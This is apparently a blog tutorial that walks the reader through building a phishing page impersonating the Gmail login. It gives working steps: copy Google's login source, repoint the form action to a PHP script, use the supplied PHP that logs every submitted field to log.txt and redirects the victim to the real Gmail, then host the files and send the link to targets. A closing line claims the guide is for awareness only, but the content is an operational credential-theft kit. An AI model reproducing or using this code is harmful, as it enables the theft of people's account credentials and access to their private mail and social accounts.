How to Make Phishing Page For Gmail & Facebook

I don’t know how many of you are aware of phishing attacks, Anyway keep in mind that, it is the most common and easiest way to hack anyone’s personal details. Some days earlier the attack has some major effects on the web. Hackers had asked for millions of money to free up the Gmail accounts they hacked. And the same is happening in Phishing Page here or there.

And then the “WannaCry” ransomware which had stuck almost many countries. They suffered a lot during this attack, Cyber thefts day-by-day are increasing.

Recommended: 5 Things To Do In Facebook For Security

In this article, We are going to share some ideas about Phishing and will show you how to make your own Phishing pages for various sites like Gmail or Facebook. For making Phishing page for any site you need 3 types of files in common. They are:

  • .Html file (ie fake page).
  • .php file or any other action script page (for tracking the details that entered in the page created by you).
  • .Txt file (To save all the details in text format).

In common, every phishing page contains these 3 files, But normally you can see only the fake page which looks exactly as original, remaining files will run in the background that will not be visible for you. Here, I am going to create a phishing page for Gmail login. Procedures for creating phishing pages for all sites are same. We are giving you detailed instructions for making this page, just follow my steps exactly as I mentioned.

Recommended: How To Know If Someone Has Blocked You On Facebook

Steps to Create Phishing Page

  • First go to Gmail login page (www.gmail.com, make sure that the page is loaded completely) and right click and select view source (in Firefox) or view source code option in other browsers.
  • Select all (CTR + A) and copy all the code and paste it in notepad.
  • Then search for the keyword action. You can see the code as given below.

action=”https://www.google.com/accounts/ServiceLoginAuth” method=”post”;

  • Just change the above code as mentioned below.

action=”mail.php” method=”post”;

After changing to mail.php (or any name.php) just save it in the form login.html (anyname.html). By finishing this step our phishing page is ready.Now we want to create script page for this phishing page.

  • For creating a php script,just copy the below php code into notepad and save in the format mail.php (name mentioned in action of our phishing page).

<?php
header (‘Location: http://www.gmail.com ‘);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

  • By this step our PHP script is also ready, now create a .Txt file with name log.txt (name mentioned in php script).
  • Now host these 3 files ie,

login.html

mail.php

log.txt

In any of free hosting servers like ripway, drivehq, 100 mb etc (or any other, just google free hosting). Make sure that these 3 files are in same directory.

  • After hosting you will get a direct link to your phishing page, that is to your login.html page. Just use this link to access or send phishing page.

How Phishing Works?

When you enter your username and password in Gmail login phishing page and click sign-in or hit enter the mail.php script is loaded and this will copy all the entered details into your log.txt file.

Since we are given www.gmail.com as the header location original Gmail page will be loaded after the PHP script. So the victim will think that they entered wrong information. If the victim is already logged in Gmail, then their mail will be loaded.

Recommended: What Is Phishing & How It Works?

NOTE: This detailed tutorial is given only for creating awareness about phishing attacks and please don’t do this for any harmful purposes. We will not be responsible for any such phishing attacks, KNOW HACKING BUT NO HACKING.

If you found anything useful in this article please pass your comments.

LEAVE A REPLY

Please enter your comment!
Please enter your name here